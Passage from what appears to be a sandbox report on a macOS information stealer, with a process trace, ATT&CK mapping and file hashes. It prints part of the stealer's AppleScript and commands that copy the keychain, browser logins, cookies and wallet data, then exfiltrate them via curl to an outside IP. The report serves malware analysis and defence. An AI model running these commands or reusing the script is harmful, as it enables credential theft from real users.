Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" "
  2⤵
  PID:529

/bin/sh
sh -c "echo \$((RANDOM % 9000 + 1000))"
1⤵
PID:530

/bin/bash
sh -c "echo \$((RANDOM % 9000 + 1000))"
1⤵
PID:530

/bin/sh
sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
1⤵
PID:531

/bin/bash
sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
1⤵
PID:531

/usr/sbin/system_profiler
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
1⤵
PID:531

/usr/bin/csrutil
/usr/bin/csrutil status
1⤵
PID:533

/bin/sh
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:536

/bin/bash
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:536

/bin/mkdir
mkdir -p /tmp/1458
1⤵
PID:536

/bin/sh
sh -c "dscl . authonly 'run' ''"
1⤵
PID:537

/bin/bash
sh -c "dscl . authonly 'run' ''"
1⤵
PID:537

/usr/bin/dscl
dscl . authonly run
1⤵
PID:537

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:538

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:538

/bin/sh
sh -c "dscl . authonly 'run' 'ELVO5'"
1⤵
PID:540

/bin/bash
sh -c "dscl . authonly 'run' 'ELVO5'"
1⤵
PID:540

/usr/bin/dscl
dscl . authonly run ELVO5
1⤵
PID:540

/bin/sh
sh -c "dscl . authonly 'run' ''"
1⤵
PID:541

/bin/bash
sh -c "dscl . authonly 'run' ''"
1⤵
PID:541

/usr/bin/dscl
dscl . authonly run
1⤵
PID:541

/bin/sh
sh -c "dscl . authonly 'run' 'run'"
1⤵
PID:542

/bin/bash
sh -c "dscl . authonly 'run' 'run'"
1⤵
PID:542

/usr/bin/dscl
dscl . authonly run run
1⤵
PID:542

/bin/sh
sh -c "dscl . authonly 'run' 'root'"
1⤵
PID:543

/bin/bash
sh -c "dscl . authonly 'run' 'root'"
1⤵
PID:543

/usr/bin/dscl
dscl . authonly run root
1⤵
PID:543

/bin/sh
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:544

/bin/bash
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:544

/bin/mkdir
mkdir -p /tmp/1458
1⤵
PID:544

/bin/sh
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:545

/bin/bash
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:545

/bin/mkdir
mkdir -p /tmp/1458
1⤵
PID:545

/bin/sh
sh -c "cat '/Users/run/Library/Keychains/login.keychain-db' > '/tmp/1458/keychain'"
1⤵
PID:546

/bin/bash
sh -c "cat '/Users/run/Library/Keychains/login.keychain-db' > '/tmp/1458/keychain'"
1⤵
PID:546
- /bin/cat
  cat /Users/run/Library/Keychains/login.keychain-db
  2⤵
  PID:547

/bin/sh
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite'"
1⤵
PID:548

/bin/bash
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite'"
1⤵
PID:548

/usr/bin/dirname
dirname /tmp/1458/FileGrabber/NoteStore.sqlite
1⤵
PID:548

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:549

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:549

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:549

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.FDDAD8C3-AC74-427E-B388-BBB21B2C5E73
1⤵
PID:552

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:552

/bin/sh
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-wal'"
1⤵
PID:553

/bin/bash
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-wal'"
1⤵
PID:553

/usr/bin/dirname
dirname /tmp/1458/FileGrabber/NoteStore.sqlite-wal
1⤵
PID:553

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:554

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:554

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:554

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.E24219E7-ECF9-4994-93BA-BF48FF6E5C24
1⤵
PID:555

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:555

/bin/sh
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-shm'"
1⤵
PID:556

/bin/bash
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-shm'"
1⤵
PID:556

/usr/bin/dirname
dirname /tmp/1458/FileGrabber/NoteStore.sqlite-shm
1⤵
PID:556

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:557

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:557

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:557

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.3936242C-0083-483F-AF41-AFA7357C93CB
1⤵
PID:558

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:558

/bin/sh
sh -c "dirname '/tmp/1458/FileGrabber/Cookies.binarycookies'"
1⤵
PID:559

/bin/bash
sh -c "dirname '/tmp/1458/FileGrabber/Cookies.binarycookies'"
1⤵
PID:559

/usr/bin/dirname
dirname /tmp/1458/FileGrabber/Cookies.binarycookies
1⤵
PID:559

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:560

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:560

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:560

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.67764882-FA8B-40F5-BAC8-D79E8F26BDE6
1⤵
PID:561

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:561

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:562

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber'"
1⤵
PID:562

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber
1⤵
PID:562

/bin/sh
sh -c "cat '/Users/run/Library/Cookies/Cookies.binarycookies' > '/tmp/1458/FileGrabber/saf1'"
1⤵
PID:563

/bin/bash
sh -c "cat '/Users/run/Library/Cookies/Cookies.binarycookies' > '/tmp/1458/FileGrabber/saf1'"
1⤵
PID:563
- /bin/cat
  cat /Users/run/Library/Cookies/Cookies.binarycookies
  2⤵
  PID:564

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber/'"
1⤵
PID:565

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber/'"
1⤵
PID:565

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber/
1⤵
PID:565

/bin/sh
sh -c "mkdir -p '/tmp/1458/FileGrabber/NotesFiles/'"
1⤵
PID:566

/bin/bash
sh -c "mkdir -p '/tmp/1458/FileGrabber/NotesFiles/'"
1⤵
PID:566

/bin/mkdir
mkdir -p /tmp/1458/FileGrabber/NotesFiles/
1⤵
PID:566

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.917AB09E-2D02-4D74-849D-72C17A0A3635
1⤵
PID:567

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:567

/bin/sh
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:568

/bin/bash
sh -c "mkdir -p '/tmp/1458'"
1⤵
PID:568

/bin/mkdir
mkdir -p /tmp/1458
1⤵
PID:568

/bin/sh
sh -c "mkdir -p '/tmp/1458/ff/2mzklot7.dev-edition-default'"
1⤵
PID:569

/bin/bash
sh -c "mkdir -p '/tmp/1458/ff/2mzklot7.dev-edition-default'"
1⤵
PID:569

/bin/mkdir
mkdir -p /tmp/1458/ff/2mzklot7.dev-edition-default
1⤵
PID:569

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/cookies.sqlite' > '/tmp/1458/ff/2mzklot7.dev-edition-default/cookies.sqlite'"
1⤵
PID:570

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/cookies.sqlite' > '/tmp/1458/ff/2mzklot7.dev-edition-default/cookies.sqlite'"
1⤵
PID:570
- /bin/cat
  cat "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/cookies.sqlite"
  2⤵
  PID:571

/bin/sh
sh -c "mkdir -p '/tmp/1458/ff/2mzklot7.dev-edition-default'"
1⤵
PID:572

/bin/bash
sh -c "mkdir -p '/tmp/1458/ff/2mzklot7.dev-edition-default'"
1⤵
PID:572

/bin/mkdir
mkdir -p /tmp/1458/ff/2mzklot7.dev-edition-default
1⤵
PID:572

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/key4.db' > '/tmp/1458/ff/2mzklot7.dev-edition-default/key4.db'"
1⤵
PID:573

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/key4.db' > '/tmp/1458/ff/2mzklot7.dev-edition-default/key4.db'"
1⤵
PID:573
- /bin/cat
  cat "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/key4.db"
  2⤵
  PID:574

/bin/sh
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:575

/bin/bash
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:575

/bin/mkdir
mkdir -p /tmp/1458/Chromium/Chrome_Default
1⤵
PID:575

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Cookies' > '/tmp/1458/Chromium/Chrome_Default/Cookies'"
1⤵
PID:576

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Cookies' > '/tmp/1458/Chromium/Chrome_Default/Cookies'"
1⤵
PID:576
- /bin/cat
  cat "/Users/run/Library/Application Support/Google/Chrome/Default/Cookies"
  2⤵
  PID:577

/bin/sh
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:578

/bin/bash
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:578

/bin/mkdir
mkdir -p /tmp/1458/Chromium/Chrome_Default
1⤵
PID:578

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Web Data' > '/tmp/1458/Chromium/Chrome_Default/Web Data'"
1⤵
PID:579

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Web Data' > '/tmp/1458/Chromium/Chrome_Default/Web Data'"
1⤵
PID:579
- /bin/cat
  cat "/Users/run/Library/Application Support/Google/Chrome/Default/Web Data"
  2⤵
  PID:580

/bin/sh
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:581

/bin/bash
sh -c "mkdir -p '/tmp/1458/Chromium/Chrome_Default'"
1⤵
PID:581

/bin/mkdir
mkdir -p /tmp/1458/Chromium/Chrome_Default
1⤵
PID:581

/bin/sh
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Login Data' > '/tmp/1458/Chromium/Chrome_Default/Login Data'"
1⤵
PID:582

/bin/bash
sh -c "cat '/Users/run/Library/Application Support/Google/Chrome/Default/Login Data' > '/tmp/1458/Chromium/Chrome_Default/Login Data'"
1⤵
PID:582
- /bin/cat
  cat "/Users/run/Library/Application Support/Google/Chrome/Default/Login Data"
  2⤵
  PID:583

/bin/sh
sh -c "ditto -c -k --sequesterRsrc /tmp/1458/ /tmp/out.zip"
1⤵
PID:584

/bin/bash
sh -c "ditto -c -k --sequesterRsrc /tmp/1458/ /tmp/out.zip"
1⤵
PID:584

/usr/bin/ditto
ditto -c -k --sequesterRsrc /tmp/1458/ /tmp/out.zip
1⤵
PID:584

/bin/sh
sh -c "curl -X POST -H \"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\" -H \"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\" -H \"cl: 0\" -H \"cn: 0\" --max-time 300 -retry 5 -retry-delay 10 -F \"file=@/tmp/out.zip\" http://141.98.9.20/joinsystem"
1⤵
PID:585

/bin/bash
sh -c "curl -X POST -H \"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\" -H \"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\" -H \"cl: 0\" -H \"cn: 0\" --max-time 300 -retry 5 -retry-delay 10 -F \"file=@/tmp/out.zip\" http://141.98.9.20/joinsystem"
1⤵
PID:585

/usr/bin/curl
curl -X POST -H "user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=" -H "BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=" -H "cl: 0" -H "cn: 0" --max-time 300 "-retry" 5 "-retry-delay" 10 -F "file=@/tmp/out.zip" http://141.98.9.20/joinsystem
1⤵
PID:585

/bin/sh
sh -c "rm -r /tmp/1458/"
1⤵
PID:586

/bin/bash
sh -c "rm -r /tmp/1458/"
1⤵
PID:586

/bin/rm
rm -r /tmp/1458/
1⤵
PID:586

/bin/sh
sh -c "rm /tmp/out.zip"
1⤵
PID:587

/bin/bash
sh -c "rm /tmp/out.zip"
1⤵
PID:587

/bin/rm
rm /tmp/out.zip
1⤵
PID:587

/usr/libexec/xpcproxy
xpcproxy org.mozilla.firefoxdeveloperedition.3088
1⤵
PID:588

/Applications/Firefox Developer Edition.app/Contents/MacOS/firefox
"/Applications/Firefox Developer Edition.app/Contents/MacOS/firefox"
1⤵
PID:588

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -parentBuildID 20240628091536 -prefsLen 24681 -prefMapSize 248244 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{043313b5-d3ab-412d-baed-99c39897ceb0}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1101942401 socket
1⤵
PID:591

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 1 -isForBrowser -prefsLen 24745 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{0b69578d-0792-4618-a4ac-b744b3ea123f}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.292495982 tab
1⤵
PID:592

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 2 -isForBrowser -prefsLen 28106 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{3d9c3f77-c95f-406a-9d52-4433bfd7fb0a}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.31092608 tab
1⤵
PID:593

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 3 -isForBrowser -prefsLen 30477 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{3df60387-2707-41c3-820b-7c30e1305e2f}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1016985583 tab
1⤵
PID:594

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -parentBuildID 20240628091536 -sandboxingKind 0 -prefsLen 30477 -prefMapSize 248244 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{daf1cbd7-884b-41c7-a051-2be6288a63dc}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1185368082 utility
1⤵
PID:596

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 4 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{771f4a74-9263-4824-a798-ad64b6fd6ee7}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.364094713 tab
1⤵
PID:597

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 5 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{eb4a3a7f-dfca-4adb-ae42-eb5147346cb7}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.480578065 tab
1⤵
PID:598

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 6 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{bbd3149c-5dca-4e6c-9a9f-b5c1657ab0e9}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1368739078 tab
1⤵
PID:599

/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 7 -isForBrowser -prefsLen 28250 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{2fe96c36-67a0-42d6-8e9c-e781c2378125}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1421779236 tab
1⤵
PID:600

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.2028
1⤵
PID:601

/Applications/Safari.app/Contents/MacOS/Safari
/Applications/Safari.app/Contents/MacOS/Safari
1⤵
PID:601

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.History
1⤵
PID:602

/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.History.xpc/Contents/MacOS/com.apple.Safari.History
/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.History.xpc/Contents/MacOS/com.apple.Safari.History
1⤵
PID:602

/usr/libexec/xpcproxy
xpcproxy com.apple.WebKit.WebContent.A06F79AA-F5E9-4313-AA2C-7EE3424FEB3C 601
1⤵
PID:603

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
1⤵
PID:603

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Unix Shell

T1059.004

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hide Artifacts

T1564

Resource Forking

T1564.009

Indicator Removal

T1070

File Deletion

T1070.004

Subvert Trust Controls

T1553

Gatekeeper Bypass

T1553.001

Credential Access

Discovery

File and Directory Discovery

T1083

Lateral Movement

Collection

Command and Control

Exfiltration

Exfiltration Over Alternative Protocol

T1048

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
12KB

MD5
f17c0b069f51f73557682efd936729d6

SHA1
81d3da7260ccac0ff076b1f3b16d9c2437f37b5f

SHA256
09c2c9d26aed4d72ce5b71fb1de7b3c4c294a9b17a3ef13055819a33fa1accc8

SHA512
53966f3529a105b18b06f57ba8c9c89fff123fc6a3267f0b9ffdedb1e966cd33e139289267094892d4674c116495c409e5512492af36232e7876ed8da393fd48

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
12KB

MD5
0a9c4d5d1c1719b2b5f165e4aabcd7b3

SHA1
2e5ddd5113fd352dfa61969ceaae3f4f06ff451c

SHA256
223def537e870b14f50134b04d306a556d4be40e886b2fece682509112411ecd

SHA512
9cd1c8cac609e95fa7ff0cbfbaf6cdf43b1d765b27d6396967cc3a2023d5d428bcd5a2215bf54cd1ae7881839f272e3c943d5e728d498058f69200baa727f451

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
12KB

MD5
4867ab717da01eb509809d5142217633

SHA1
2bc1485a51259abfd61801301735a38b26bf9a89

SHA256
a6ac534e07c61b2d3b51468114c54cca7236890f41555d14fec5b430cca957e8

SHA512
ed4cd3be76d504880c4f1b5e6659a2347f7ee9e795e35b0b74a2dc22f256561d0972331776a3b7feb295b8fc8c31fb8a5a42c4d5f2ad03fb4dccd9a4ba54079c

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
12KB

MD5
0ab3df9a8e01bbde2c7cdbf99ee60fce

SHA1
19f081b9263bdb5516f6841ee359dd041c0e1d0c

SHA256
0d3f69f493cfccb83e4dac338685dc97619f123ea86708aa65685e352ab9add3

SHA512
f6bea5fa19dcbf464232a18fc1f9921e1592ccda7fc157a70ca53f5585c113a2c9e4dabc24b30ee86219ef98f848ad20a0ceba9e5d3c01e6928b82bcac8db834

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
12KB

MD5
b8208d33984443b676a047c89ad19816

SHA1
074b226f34d52ec85f0389b7c0ee3a7900ba46b0

SHA256
44ba7b2adbd7db6d6cb21e596a9e6fa9649bffe40d5a81165d3602e224a813ef

SHA512
826c6a347c73843a2b078011132a8527c918bc5bead98174bd97b52b07d072e86c209a3dead278c9cb5052fc4da6d19969fd5e9e2db81a04a1194d9dc39e1c8d

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
12KB

MD5
f0d9b7251a27e6b2bc724b41757fd2ad

SHA1
40e7c0021bad693e5d1b8eab2e95397fcb40249a

SHA256
62c5804b8e0585189b5cda49574c95476868f2cd49e39dc2a1408797d1e76230

SHA512
0a71c684007610431b7b6b74ed24f9e342c1d392620c4330c19823c99b5539971e6e7f51a2546711e7e4127c325ad148fc5adb50399d5f7d805b79f5ba61aa72

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
12KB

MD5
c9335d81b694103006be6308db981706

SHA1
ad13de2368632e80dbe6cdcba0468e288a016a19

SHA256
2b13ebdb00237a4ea7821289f79f2e08f29c63e0fd1c1bc6a7639ff537c582a3

SHA512
e6d575a870986079a44dc7acfbf42baeb8c7d1207372eb8f517edadb9ac9b80eb886240d2651dd77a62484afcfaee664a64b1d2b3e761d404559a7b37fbf4e97

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
12KB

MD5
ea98707f5761f507b280efc6ecba2a0c

SHA1
a0d848c156ca772f15ab16d4860470b69cba15b1

SHA256
190e9cd455099c0fb591a5d48f86ece8c735a8275306de98e4176dd9499339e9

SHA512
c0e48949fffc06c417046ec633589f1c568ea26b4f9db3eb334bdc97aa407493217ceaac7640bf187a7d09e2c3e2426bf345bd586642fa5097eceec22654b2e5

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
7KB

MD5
a60e09cbfcc3ab4013fc1703913e85e5

SHA1
85e30f0310227f218ad76563609880910780485b

SHA256
ec00b2166eb23c20f10a40cea7fd147fdf57d622313c16931abb14b558a29903

SHA512
610ffa90911cf5207baab9a7f85ce81dd5fc987b8af92ce6776a4fae3cb2c66da0714daf19c66afe04397b386fb5877313209b251b5b9136aa18f7f29904eb1f

Download Submit
/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default/AlternateServices.bin

Filesize
7KB

MD5
f91b5f3321a8fad56d607ee3e5f7ded7

SHA1
d7d0202ab458bf5a7f3d9ce60980337eedb887f0

SHA256
81dff0d1c60368b9c2f94d8ef7ea233de3b41966f7c8bed30a589b5ef8a9cb9c

SHA512
